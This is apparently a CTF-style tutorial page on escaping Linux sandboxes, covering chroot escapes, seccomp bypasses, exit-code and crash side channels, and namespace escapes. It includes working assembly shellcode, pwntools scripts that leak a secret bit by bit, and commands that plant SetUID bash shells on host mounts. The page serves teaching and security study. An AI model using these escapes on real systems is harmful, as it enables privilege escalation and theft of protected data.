description |
---|
Escaping from sandboxes environments by exploiting the capabilities that were left open |
chroot is a command and syscall that means Change Root, which will change the meaning of /
. You provide it with a path to a directory that will be the jail, and it does two things (source):
- Point
/
to the jailed directory (eg./tmp/jail
) - While inside the jail,
../
will not go up further than the root (/tmp/jail/..
->/tmp/jail
)
This command or syscall normally needs root permissions to work, and can be called like this:
chroot("/tmp/jail")
Or in the shell:
$ chroot /tmp/jail
Afterward, any path starting with /
will be relative to /tmp/jail
, and if your current directory is /tmp/jail
, any ../
attempt will stop at /tmp/jail
. A common pitfall is the fact that paths like /bin/bash
or even dynamically linked libraries to spawn a shell are also relative to here, so all required functionality needs to be moved into the jail directory to work.
Importantly, what it does not do is:
- Close existing resources (file descriptors)
- Change the current working directory into the jail
It is not intended to be a security measure, as it is very limited in what it does, and many tricks can get past its protections, as will be explained in the following section.
One simple problem might be that the current directory is not set inside the jail. This allows you to access any file in your current directory before entering the jail and allows you to use ../
sequences freely. The only catch is that /
paths will still be relative to the jail.
$ cd / # move to root first
$ ./program # progam might chroot() us to /tmp/jail, but forget to chdir()
# cat /flag # attempt to access normally
/tmp/jail/flag: No such file or directory
# cat flag # flag will be relative to CWD, so /flag is accessed
CTF{f4k3_fl4g_f0r_t3st1ng}
$ ./program # start from anywhere outside of /tmp/jail
# cat ../../flag # directory traversal is still possible
CTF{f4k3_fl4g_f0r_t3st1ng}
shellcode.md (Assembly - readfile.s
)
{% code title="readfile.s" %}
.global _start
_start:
.intel_syntax noprefix
mov rax, 2
lea rdi, [rip+flag]
mov rsi, 0
syscall ; open("flag", O_RDONLY)
mov rsi, rax ; use return value (fd)
mov rax, 40
mov rdi, 1 ; STDOUT
mov rdx, 0
mov r10, 100
syscall ; sendfile(STDOUT, flag_fd, 0, 100)
flag:
.string "../../flag"
{% endcode %}
Another big problem is that you can only have one chroot at a time, meaning if another chroot is started the previous one will be forgotten. Remember that only users with the CAP_SYS_CHROOT
capability can call it, but if you are able to it is trivial to escape the jail, even from inside it. This can be done by moving the jail to somewhere you are not, such as a new directory you make.
$ ./program # this time chroot() and chdir() are called
# cat ../../flag # first attempt fails because ../ inside jail doesn't work
/tmp/jail/flag: No such file or directory
# mkdir new_dir
# chroot new_dir # set chroot() to a new directory you are not in
# cat ../../flag # now ../ is not restricted
CTF{f4k3_fl4g_f0r_t3st1ng}
shellcode.md (Assembly - mkdir-chroot.s
)
{% code title="mkdir-chroot.s" %}
.global _start
_start:
.intel_syntax noprefix
mov rax, 83
lea rdi, [rip+dir]
mov rsi, 0777
syscall ; mkdir("a", rwx)
mov rax, 161
lea rdi, [rip+dir]
syscall ; chroot("a")
; Now cwd is outside the chroot
mov rax, 2
lea rdi, [rip+flag]
mov rsi, 0
syscall ; open("/flag", O_RDONLY)
mov rsi, rax ; use return value (fd)
mov rax, 40
mov rdi, 1 ; STDOUT
mov rdx, 0
mov r10, 100
syscall ; sendfile(STDOUT, flag_fd, 0, 100)
dir:
.string "a"
flag:
.string "../../flag"
{% endcode %}
The last trick is utilizing already-opened resources that are outside the jail, which you can still interact with. If you are able to open
the /flag
file before being jailed for example, you can still read from the file descriptor it has (starts at 3).
// === Somewhere earlier in the program ===
open("/flag") // -> returns 3 as fd
chroot(...)
// === In the shellcode ===
//sendfile(int out_fd, int in_fd, off_t *offset, size_t count)
sendfile(1, 3, 0, 100)
shellcode.md (Assembly - fd-sendfile.s
)
{% code title="fd-sendfile.s" %}
.global _start
_start:
.intel_syntax noprefix
mov rax, 40
mov rdi, 1 ; STDOUT
mov rsi, 3 ; previously open file descriptor of /flag
mov rdx, 0
mov r10, 100
syscall ; sendfile(STDOUT, flag_fd, 0, 100)
{% endcode %}
The same goes for open directories, where you can use it as a different relative directory using syscalls like openat
instead of open
, or fchmodat
instead of chmod
.
// === Somewhere earlier in the program ===
open("/any/path") // -> returns 3 as fd
chroot(...)
// === In the shellcode ===
//sendfile(int out_fd, int in_fd, off_t *offset, size_t count)
fd = openat(3, "../../flag", 0) // -> returns 4 as fd
sendfile(1, fd, 0, 100)
shellcode.md (Assembly - fd-openat.s
)
{% code title="fd-openat.s" %}
.global _start
_start:
.intel_syntax noprefix
mov rax, 257
mov rdi, 3
lea rsi, [rip+flag]
mov rdx, 0
syscall # openat("/any/path", "../../flag", O_RDONLY)
mov rsi, rax # return value (fd)
mov rax, 40
mov rdi, 1 # STDOUT
mov rdx, 0
mov r10, 100
syscall # sendfile(STDOUT, flag_fd, 0, 100)
flag:
.string "../../flag"
{% endcode %}
This last method is even more powerful because if you are able to start the program yourself via bash (like SetUID), you can let bash open a directory for you using the [n]< path
syntax:
# # === same effect as above ===
$ ./program 3< /any/path
{% hint style="info" %}
Using the fchdir
syscall you can also use this trick to change the current directory outside the chroot, and use ../
directory traversal tricks again
{% endhint %}
Seccomp (secure computing mode) is built to be a security mechanism, unlike #chroot. It is a highly customizable way to restrict which syscalls are allowed and does so like a network firewall (it even uses the Berkley Packet Filter, originally made for networking). Often you will see this as an allowlist (all blocked except a few) or a blocklist (all allowed except a few). Blocklists are inherently dangerous because a developer may forget a dangerous call with unexpected functionality, but syscalls in an allowlist may still give unnecessary permissions that can be exploited.
A simple example of a blocklist using seccomp
looks like this:
scmp_filter_ctx ctx; // define context variable to set up rules
// Kill the program on any syscall
ctx = seccomp_init(SCMP_ACT_KILL);
// ... except read (allow)
seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(read), 0) == 0);
// ... except write (allow)
seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(write), 0) == 0);
// load the context, rules are applied from now on
seccomp_load(ctx) == 0);
This is an irreversible action that will make it so the rules are applied to any code further on the program, such as shellcode and even child processes or forks, but also any code the program contains itself. Because of this, the rules need to be lenient enough to allow regularly required code, but not so lenient that an exploit can abuse it.
A good start in trying to bypass these rules is understanding them correctly. While static analysis might be enough for a simple program, a more complex one can be easier to understand through dynamic analysis. The following tool implements handy utilities for extracting seccomp rules:
{% embed url="https://github.com/david942j/seccomp-tools" %} A tool to extract and work with seccomp rules {% endembed %}
The simplest and most common command is seccomp-tools dump
which takes a binary that it will run. Using ptrace
it can extract the seccomp rules at runtime and print them to the console:
$ seccomp-tools dump ./binary
line CODE JT JF K
=================================
0000: 0x20 0x00 0x00 0x00000004 A = arch
0001: 0x15 0x00 0x25 0xc000003e if (A != ARCH_X86_64) goto 0008
0002: 0x20 0x00 0x00 0x00000000 A = sys_number
0003: 0x15 0x00 0x01 0x00000002 if (A != open) goto 0005
0004: 0x06 0x00 0x00 0x00000000 return KILL
0005: 0x15 0x00 0x01 0x00000101 if (A != openat) goto 0007
0006: 0x06 0x00 0x00 0x00000000 return KILL
0007: 0x15 0x00 0x01 0x0000003b if (A != execve) goto 0009
0008: 0x06 0x00 0x00 0x00000000 return KILL
0009: 0x06 0x00 0x00 0x7fff0000 return ALLOW
Seccomp rules are built with Berkeley Packet Filters (BPF), meaning they have instructions and code flow like assembly. This is what you see dumped and can analyze.
In the above example, it first checks if the architecture is equal to 64-bit syscalls, if not, it will goto
the return KILL
command, blocking any 32-bit syscalls. Then step by step the open
, openat
, and execve
syscalls are checked and killed if it is any of those. When it passes through all the checks it ends at return ALLOW
continuing with the syscall.
In more practical situations you might need some arguments or configuration for the seccomp filter to activate, where this tool won't find them yet by just running the binary. A simple trick for passing arguments is creating a .sh
file that starts the program how you want it, then analyze that:
$ nano start.sh
./binary arg1 arg2 arg3
$ chmod +x start.sh
$ seccomp-tools dump ./start.sh
...
Lastly, you can even attach to a running process with this tool if the process is in a seccomp'ed state you would like to analyze.
$ sudo seccomp-tools dump -p 1337
$ sudo seccomp-tools dump -p `pidof binary`
There is no clean-cut way to "bypass" any seccomp configuration, and it really depends on what specific syscalls are allowed or denied. With that being said, there are some tricks developers might not expect that can still lead to a big impact (source).
When common syscalls like open
are blocked, there may be syscalls the developer forgot to block. Something like openat
might still be allowed, while it can do almost the same using a Directory File Descriptor (DFD). In this specific case, a useful variable is AT_FDCWD
which has a value of -100
. It is a default DFD that points to the current working directory, meaning it can be used as a valid DFD in the ...at
versions of syscalls.
There are simply a ton of syscalls, making a blocklist hard to make secure. You can check out a table of all syscalls to find one that seems interesting and is allowed, and get more information about an unknown syscall using the man 2
command for syscalls (eg. man 2 openat
).
This is a special case. There are two types of syscalls: syscall
for 64-bit and int 0x80
for 32-bit. These architectures have different syscall numbers dependent on rax
and eax
respectively. By default, seccomp will kill all 32-bit syscalls. However, in certain non-default situations, you might find the 32-bit syscalls are enabled and more permissive than 64-bit. They can be enabled with the following line, and afterward need to be handled separately from 64-bit syscalls:
seccomp_arch_add(ctx, SCMP_ARCH_X86);
To exploit this, simply use a 32-bit syscall table and int 0x80
instructions instead of syscall
. During compilation you don't need to do anything special, here is an example:
{% code title="32-bit.s" %}
mov eax, 5
lea ebx, [rip+flag]
mov ecx, 0
int 0x80 ; open("flag", O_RDONLY)
mov ecx, eax ; return value (fd)
mov eax, 187
mov ebx, 1 ; STDOUT
mov edx, 0
mov esi, 100
int 0x80 ; sendfile(STDOUT, flag_fd, 0, 100)
flag:
.string "flag"
{% endcode %}
While you might want to execute a shell using execve()
, sometimes leaking secrets can be enough. If you find yourself being able to access sensitive information without being able to exfiltrate it to yourself, think about possible Side Channels. Even 1 bit of information can eventually be a full secret if repeated often enough. Here are some ideas:
- The exit code of the program is 8 bits (0-255), using
exit()
: In bash, you can check the exit code of the previous command with the$?
variable, and executing a program in any programing language often returns its 8-bit exit code. If you are able to read it you can exfiltrate 8 bits in one go, like one character of a string. Then repeatedly do this for each character in the string. - The runtime of a program, similar to Blind SQL Injection (
sleep()
, long computation, loop): To be efficient, this is a balance between a low wait for fast attempts, and a long enough wait to be able to confidently measure the difference. This scenario can be useful if there is really no response from the program, like in a remote setting. - Crash vs no crash: In some cases, it is obvious that a program crashed, because the application explicitly told you with an error message or simply if some expected output is missing. This can tell you 1 bit of information by either crashing or continuing execution, and the way to exploit this is similar to using the runtime of the program.
Using the exit code is pretty straightforward. We will read the flag into memory, then load a byte of it into the exit()
argument, and call the function. In Assembly, we could leak the first byte:
mov rax, 0
mov rdi, 3 ; "/flag" fd (already open)
lea rsi, [rsp-100] ; read onto stack
mov rdx, 100
syscall ; read("flag", flag, 100)
mov rax, 60
mov rdi, [rsi+0] ; offset here is 0, increment for next byte
syscall ; exit(flag[0])
This might give exit code 67 when we check using echo $?
, which corresponds to the C
character. To leak the whole secret, we simply keep doing this while incrementing the offset:
Python Script (go through all bytes)
from pwn import *
elf = context.binary = ELF('./binary')
flag = b""
for i in range(100):
# Dynamically compile the assembly needed
payload = asm(f"""
mov rax, 0
mov rdi, 3
lea rsi, [rsp-100]
mov rdx, 100
syscall
mov rax, 60
mov rdi, [rsi+{i}] # <- insert i (offset) here
syscall
""")
p = process()
p.send(payload)
exit_code = p.poll(True) # Block until program exits
flag += bytes([exit_code])
print(flag)
p.close()
When the exit code is not directly visible, you might be able to get a boolean response using the time or crash method. Implementing this can be done in various ways, but the simplest and most efficient way is to simply take the n
th bit, and decide what to do depending on that bit.
To crash the program, you could read/write from an unmapped address for a 1, and simply ret
for a 0. This is nicer than a time-based boolean result because you get an instant yes/no response, allowing quicker and more confident extraction. To extract a single bit in assembly, you can first use a byte offset, and then shift it using a bit offset:
mov rax, 0
mov rdi, 3
lea rsi, [rsp-100]
mov rdx, 100
syscall
mov al, BYTE PTR [rsi+1] ; 8a 46 01 (01 is byte placeholder)
and al, 2 ; 24 02 (02 is bit placeholder)
jnz crash ; jump depending on result
ret
crash:
mov QWORD PTR [rax], 0 ; Write at a random unmapped address
We can then dynamically change this payload to get any byte and bit we need. In a Python script we go through all the bits to slowly recover the whole secret:
Python Script (go through all bits)
from pwn import *
elf = context.binary = ELF('./binary')
PAYLOAD = asm("""
mov rax, 0
mov rdi, 3
lea rsi, [rsp-100]
mov rdx, 100
syscall
mov al, BYTE PTR [rsi+1] # 8a 46 01
and al, 2 # 24 02
jnz crash
ret
crash:
mov BYTE PTR [rax], 0
""")
def get_bit(offset):
p = process([elf.path, '/flag'])
byte = offset // 8
bit = offset % 8
payload = PAYLOAD # Replace byte and bit placeholders
payload = payload.replace(b"\x8a\x46\x01", bytes([0x8a, 0x46, byte]))
payload = payload.replace(b"\x24\x02", bytes([0x24, 1 << bit]))
p.send(payload)
exit_code = p.poll(True) # Block until exit
p.close()
if exit_code not in [-11, -31]:
return get_bit(offset) # something unexpected happened, try again
return exit_code == -11
flag = b""
binary = ""
i = 0
while not flag.endswith(b"}"):
binary = ("1" if get_bit(i) else "0") + binary
print(f"{binary: >8}") # Build out byte in binary first
if len(binary) == 8: # If full byte, convert to ASCII
flag += bytes([int(binary, 2)])
binary = ""
print(flag)
i += 1
The workings of namespaces can go very complex, so this section will not go very deep. It will only show a few simple ideas on how to escape from namespaces with specific permissive features.
One dangerous part of namespaces is the ability to mount the host filesystem in the sandboxed environment. If you can read/write as a high-privilege user in the sandbox, you can do the same on the mount. This is the most interesting when you have access to a low user on the host machine, and access to a high user inside the sandbox. These can interact with each other to possibly receive high privileges on the host machine.
Imagine there is a /data
directory mounted to /tmp/data
in the sandbox that comes from the host. When you can write here, you can create a SetUID binary as the high-privilege user to then access as the low-privilege user on the host machine:
$ ./program # Enter sandbox
# cp /bin/bash /data/bash # Create a shell binary through mount on the host
# chmod +s /data/bash # Set SetUID permissions on the shell binary
# # === using shellcode ===
# chmod("/data/bash", 06777)
# # Back on the host machine
$ /tmp/data/bash -p # Execute the created SUID shell
bash-5.0#
Even when there is no directory explicitly mounted, you may be able to write a SetUID shell and access it on the host through the jail directory. Similarly to #chroot, namespaces can use pivot_root
to change the /
to somewhere else. If you can make this directory accessible to the low-privilege host user, however, you may be able to access the SetUID shell again because it exists on the same filesystem:
$ ./program # Enter sandbox
# cp /bin/bash bash # Create shell binary
# chmod +s bash # Set SetUID permissions as root
# chmod 777 . # Allow low-privilege host user to access the jail directory
# # Back on the host machine
$ /tmp/jail/bash -p # Execute the created SUID shell
bash-5.0#